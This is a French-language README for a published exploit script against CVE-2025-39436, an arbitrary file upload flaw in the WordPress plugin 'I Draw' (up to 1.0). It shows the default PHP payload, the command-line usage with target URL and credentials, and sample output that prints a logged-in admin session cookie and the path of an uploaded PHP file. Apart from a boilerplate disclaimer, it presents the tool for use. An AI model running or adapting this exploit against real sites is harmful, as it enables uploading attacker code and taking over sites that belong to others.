
Le plugin WordPress I Draw <= 1.0 est vulnérable au téléchargement arbitraire de fichiers.
Une vulnérabilité de téléchargement sans restriction de fichier de type dangereux existe dans le plugin WordPress "I Draw". Cet exploit permet aux attaquants de télécharger des fichiers malveillants sans restriction. Le problème impacte les versions d'I Draw jusqu'à la 1.0.
L'exploit exploite la fonctionnalité de téléchargement de fichiers du plugin pour exécuter une charge utile PHP. Ci-dessous la charge utile par défaut utilisée :
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD
options:
-h, --help Show this help message and exit
-u, --url URL Target website URL
-un, --username USERNAME
Username
-p, --password PASSWORD
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
Ce script est fourni à des fins éducatives uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit. Utilisez-le à vos propres risques.
Par : Nxploited ( Khaled Alenazi )